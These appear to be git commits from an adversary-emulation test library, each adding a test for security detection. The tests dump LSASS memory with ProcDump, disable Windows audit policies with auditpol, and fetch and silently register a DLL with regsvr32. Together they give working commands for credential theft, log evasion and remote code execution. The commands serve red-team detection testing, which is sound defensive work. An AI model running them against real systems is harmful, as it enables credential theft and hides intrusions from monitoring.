b/atomics/Indexes/Indexes-CSV/index.csv index cab460c0..24db6df3 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -215,6 +215,7 @@ credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows T credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell +credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 2efff797..f3318313 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -23,6 +23,7 @@ credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows T credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell +credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index afc3f27c..3f8b1a3d 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -437,6 +437,7 @@ - Atomic Test #6: Offline Credential Theft With Mimikatz [windows] - Atomic Test #7: LSASS read with pypykatz [windows] - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] + - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index c55feaa0..d0355b01 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -47,6 +47,7 @@ - Atomic Test #6: Offline Credential Theft With Mimikatz [windows] - Atomic Test #7: LSASS read with pypykatz [windows] - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] + - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 568771e0..ec115ee4 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -20519,6 +20519,47 @@ credential-access: ' name: powershell elevation_required: true + - name: Create Mini Dump of LSASS.exe using ProcDump + auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b + description: | + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals + ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe + + Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. + + If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. + supported_platforms: + - windows + input_arguments: + output_file: + description: Path where resulting dump should be placed + type: Path + default: C:\Windows\Temp\lsass_dump.dmp + procdump_exe: + description: Path of Procdump executable + type: Path + default: PathToAtomicsFolder\T1003.001\bin\procdump.exe + dependency_executor_name: powershell + dependencies: + - description: 'ProcDump tool from Sysinternals must exist on disk at specified + location (#{procdump_exe}) + +' + prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} + +' + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" + Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force + New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null + Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force + executor: + command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n" + cleanup_command: 'del "#{output_file}" >nul 2> nul + +' + name: command_prompt + elevation_required: true T1557: technique: external_references: diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index 12664f66..e90f33b9 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -42,6 +42,8 @@ The following SSPs can be used to access credentials: - [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1) +- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump) +
@@ -418,4 +420,58 @@ Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore +
+
+ +## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump +The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals +ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe + +Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. + +If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp| +| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003.001\bin\procdump.exe| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +#{procdump_exe} -accepteula -mm lsass.exe #{output_file} +``` + +#### Cleanup Commands: +```cmd +del "#{output_file}" >nul 2> nul +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) +##### Check Prereq Commands: +```powershell +if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" +Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force +New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null +Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force +``` + + + +
From f8c8fbcab13df73c9ac9fa180db8bebcac74341a Mon Sep 17 00:00:00 2001 From: BlueTeamOps <1480956+blueteam0ps@users.noreply.github.com> Date: Wed, 10 Feb 2021 05:13:25 +1100 Subject: [PATCH 099/131] Added Audit Policy Config based Logging Impairment (#1378) * Added Audit Policy Config based Logging Impairment Auditpol can be used to manipulate audit log configuration. Test 3 simulates the adversary disabling certain audit policies to prevent respective events from being recorded in the log * Add link, update test name Adding in the Solarigate write-up link for reference and also removing the test # from the title (this gets added automatically to the Markdown file) * added cleanup commands Hi Carrie, The pre-req commands enables the auditpols initially so that it can be disabled when the atomic command is executed. I have copied the same syntax as pre-req to clean-up so it is reinstated. Based on additional research I have several more commands of interest I would like to add which were not part of the MS article but would be considered suspicious. Shall I add them as separate tests? i.e. sub-commands such as clear, restore, remove * Removed the dependency section Removed the dependency section Co-authored-by: Carrie Roberts --- atomics/T1562.002/T1562.002.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/atomics/T1562.002/T1562.002.yaml b/atomics/T1562.002/T1562.002.yaml index 7b8c7b9b..bd006f32 100644 --- a/atomics/T1562.002/T1562.002.yaml +++ b/atomics/T1562.002/T1562.002.yaml @@ -40,3 +40,22 @@ atomic_tests: Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red name: powershell elevation_required: true +- name: 'Impair Windows Audit Log Policy' + description: >- + Disables the windows audit policy to prevent key host based telemetry being + written into the event logs. + + [Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/) + supported_platforms: + - windows + executor: + command: | + auditpol /set /category:"Account Logon" /success:disable /failure:disable + auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable + auditpol /set /category:"Detailed Tracking" /success:disable + cleanup_command: | + auditpol /set /category:"Account Logon" /success:enable /failure:enable + auditpol /set /category:"Detailed Tracking" /success:enable + auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable + name: command_prompt + elevation_required: true From c5d92bca5d8b2a2b945d26b43d9cbd10ef08a610 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 9 Feb 2021 18:14:01 +0000 Subject: [PATCH 100/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1562.002/T1562.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1562.002/T1562.002.yaml b/atomics/T1562.002/T1562.002.yaml index bd006f32..c62376f4 100644 --- a/atomics/T1562.002/T1562.002.yaml +++ b/atomics/T1562.002/T1562.002.yaml @@ -41,6 +41,7 @@ atomic_tests: name: powershell elevation_required: true - name: 'Impair Windows Audit Log Policy' + auto_generated_guid: 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 description: >- Disables the windows audit policy to prevent key host based telemetry being written into the event logs. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index b7d3c91a..55a0bcae 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -656,3 +656,4 @@ ec3a835e-adca-4c7c-88d2-853b69c11bb9 ab042179-c0c5-402f-9bc8-42741f5ce359 584331dd-75bc-4c02-9e0b-17f5fd81c748 7cede33f-0acd-44ef-9774-15511300b24b +5102a3a7-e2d7-4129-9e45-f483f2e0eea8 From adb82563472f1d1e1d75dae295f906a5f366f4a1 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 9 Feb 2021 18:14:10 +0000 Subject: [PATCH 101/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 18 ++++++++++ atomics/T1562.002/T1562.002.md | 35 +++++++++++++++++++ 6 files changed, 57 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 24db6df3..e31635e2 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -328,6 +328,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell +defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable iptables firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index f3318313..c1d95468 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -175,6 +175,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell +defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 3f8b1a3d..2d4ae5e4 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -642,6 +642,7 @@ - [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md) - Atomic Test #1: Disable Windows IIS HTTP Logging [windows] - Atomic Test #2: Kill Event Log Service Threads [windows] + - Atomic Test #3: Impair Windows Audit Log Policy [windows] - T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md) - Atomic Test #1: Disable iptables firewall [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d0355b01..60726942 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -339,6 +339,7 @@ - [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md) - Atomic Test #1: Disable Windows IIS HTTP Logging [windows] - Atomic Test #2: Kill Event Log Service Threads [windows] + - Atomic Test #3: Impair Windows Audit Log Policy [windows] - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md) - Atomic Test #2: Disable Microsoft Defender Firewall [windows] - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index ec115ee4..579fd975 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -28885,6 +28885,24 @@ defense-evasion: -fore red name: powershell elevation_required: true + - name: Impair Windows Audit Log Policy + auto_generated_guid: 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 + description: |- + Disables the windows audit policy to prevent key host based telemetry being written into the event logs. + [Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/) + supported_platforms: + - windows + executor: + command: | + auditpol /set /category:"Account Logon" /success:disable /failure:disable + auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable + auditpol /set /category:"Detailed Tracking" /success:disable + cleanup_command: | + auditpol /set /category:"Account Logon" /success:enable /failure:enable + auditpol /set /category:"Detailed Tracking" /success:enable + auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable + name: command_prompt + elevation_required: true T1562.007: technique: external_references: diff --git a/atomics/T1562.002/T1562.002.md b/atomics/T1562.002/T1562.002.md index 5701512c..3148b496 100644 --- a/atomics/T1562.002/T1562.002.md +++ b/atomics/T1562.002/T1562.002.md @@ -10,6 +10,8 @@ Adversaries may targeting system-wide logging or just that of a particular appli - [Atomic Test #2 - Kill Event Log Service Threads](#atomic-test-2---kill-event-log-service-threads) +- [Atomic Test #3 - Impair Windows Audit Log Policy](#atomic-test-3---impair-windows-audit-log-policy) +
@@ -81,4 +83,37 @@ Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red +
+
+ +## Atomic Test #3 - Impair Windows Audit Log Policy +Disables the windows audit policy to prevent key host based telemetry being written into the event logs. +[Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/) + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +auditpol /set /category:"Account Logon" /success:disable /failure:disable +auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable +auditpol /set /category:"Detailed Tracking" /success:disable +``` + +#### Cleanup Commands: +```cmd +auditpol /set /category:"Account Logon" /success:enable /failure:enable +auditpol /set /category:"Detailed Tracking" /success:enable +auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable +``` + + + + +
From 9ae0109e922c9ff9a7dd50553d62a81fdfc93372 Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Tue, 9 Feb 2021 12:16:09 -0600 Subject: [PATCH 102/131] Update T1218.010.yaml (#1383) Added Test 5: Regsvr32 Silent DLL Install Call DllRegisterServer Co-authored-by: Carrie Roberts --- atomics/T1218.010/T1218.010.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/atomics/T1218.010/T1218.010.yaml b/atomics/T1218.010/T1218.010.yaml index 9fab6f02..676a0339 100644 --- a/atomics/T1218.010/T1218.010.yaml +++ b/atomics/T1218.010/T1218.010.yaml @@ -128,3 +128,31 @@ atomic_tests: #{regsvr32path}\#{regsvr32name} /s #{dll_file} cleanup_command: | #{regsvr32path}\#{regsvr32name} /U /s #{dll_file} + +- name: Regsvr32 Silent DLL Install Call DllRegisterServer + description: Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer. + supported_platforms: + - windows + input_arguments: + dll_name: + description: Name of DLL to Install + type: String + default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll + regsvr32path: + description: Default location of Regsvr32.exe + type: String + default: C:\Windows\system32 + regsvr32name: + description: Default name of Regsvr32.exe + type: String + default: regsvr32.exe + dependency_executor_name: powershell + dependencies: + - description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) + prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" + executor: + command: '#{regsvr32path}\#{regsvr32name} /s /i #{dll_name}' + name: command_prompt From 87c5003eb567e7b9b185b22bea3cb9d2e8a57d8d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 9 Feb 2021 18:16:30 +0000 Subject: [PATCH 103/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1218.010/T1218.010.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1218.010/T1218.010.yaml b/atomics/T1218.010/T1218.010.yaml index 676a0339..4aeaaf1d 100644 --- a/atomics/T1218.010/T1218.010.yaml +++ b/atomics/T1218.010/T1218.010.yaml @@ -130,6 +130,7 @@ atomic_tests: #{regsvr32path}\#{regsvr32name} /U /s #{dll_file} - name: Regsvr32 Silent DLL Install Call DllRegisterServer + auto_generated_guid: 9d71c492-ea2e-4c08-af16-c6994cdf029f description: Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer. supported_platforms: - windows diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 55a0bcae..fdd04b7f 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -657,3 +657,4 @@ ab042179-c0c5-402f-9bc8-42741f5ce359 584331dd-75bc-4c02-9e0b-17f5fd81c748 7cede33f-0acd-44ef-9774-15511300b24b 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 +9d71c492-ea2e-4c08-af16-c6994cdf029f From e922799d431cef2d24691ee970bd6b84c0bb7838 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 9 Feb 2021 18:16:39 +0000 Subject: [PATCH 104/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 31 +++++++++++++ atomics/T1218.010/T1218.010.md | 46 +++++++++++++++++++ 6 files changed, 81 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e31635e2..466ec3ec 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -470,6 +470,7 @@ defense-evasion,T1218.010,Regsvr32,1,Regsvr32 local COM scriptlet execution,449a defense-evasion,T1218.010,Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt defense-evasion,T1218.010,Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt defense-evasion,T1218.010,Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt +defense-evasion,T1218.010,Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt defense-evasion,T1036.003,Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh defense-evasion,T1036.003,Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index c1d95468..df92f2e3 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -276,6 +276,7 @@ defense-evasion,T1218.010,Regsvr32,1,Regsvr32 local COM scriptlet execution,449a defense-evasion,T1218.010,Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt defense-evasion,T1218.010,Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt defense-evasion,T1218.010,Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt +defense-evasion,T1218.010,Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt defense-evasion,T1036.003,Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt defense-evasion,T1036.003,Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt defense-evasion,T1036.003,Rename System Utilities,4,Masquerading - wscript.exe running as svchost.exe,24136435-c91a-4ede-9da1-8b284a1c1a23,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 2d4ae5e4..3a5c0299 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -862,6 +862,7 @@ - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] - Atomic Test #3: Regsvr32 local DLL execution [windows] - Atomic Test #4: Regsvr32 Registering Non DLL [windows] + - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows] - [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md) - Atomic Test #1: Masquerading as Windows LSASS process [windows] - Atomic Test #2: Masquerading as Linux crond process. [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 60726942..093a7787 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -498,6 +498,7 @@ - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] - Atomic Test #3: Regsvr32 local DLL execution [windows] - Atomic Test #4: Regsvr32 Registering Non DLL [windows] + - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows] - [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md) - Atomic Test #1: Masquerading as Windows LSASS process [windows] - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 579fd975..840fc4ae 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -37850,6 +37850,37 @@ defense-evasion: elevation_required: false command: "#{regsvr32path}\\#{regsvr32name} /s #{dll_file}\n" cleanup_command: "#{regsvr32path}\\#{regsvr32name} /U /s #{dll_file}\n" + - name: Regsvr32 Silent DLL Install Call DllRegisterServer + auto_generated_guid: 9d71c492-ea2e-4c08-af16-c6994cdf029f + description: Regsvr32.exe is a command-line program used to register and unregister + OLE controls. Normally, an install is executed with /n to prevent calling + DllRegisterServer. + supported_platforms: + - windows + input_arguments: + dll_name: + description: Name of DLL to Install + type: String + default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll + regsvr32path: + description: Default location of Regsvr32.exe + type: String + default: C:\Windows\system32 + regsvr32name: + description: Default name of Regsvr32.exe + type: String + default: regsvr32.exe + dependency_executor_name: powershell + dependencies: + - description: AllTheThingsx86.dll must exist on disk at specified location + (#{dll_name}) + prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" + executor: + command: "#{regsvr32path}\\#{regsvr32name} /s /i #{dll_name}" + name: command_prompt T1036.003: technique: external_references: diff --git a/atomics/T1218.010/T1218.010.md b/atomics/T1218.010/T1218.010.md index 4bf31909..043c0a8c 100644 --- a/atomics/T1218.010/T1218.010.md +++ b/atomics/T1218.010/T1218.010.md @@ -16,6 +16,8 @@ Regsvr32.exe can also be leveraged to register a COM Object used to establish pe - [Atomic Test #4 - Regsvr32 Registering Non DLL](#atomic-test-4---regsvr32-registering-non-dll) +- [Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer](#atomic-test-5---regsvr32-silent-dll-install-call-dllregisterserver) +
@@ -183,4 +185,48 @@ copy "C:\Windows\System32\shell32.dll" "#{dll_file}" +
+
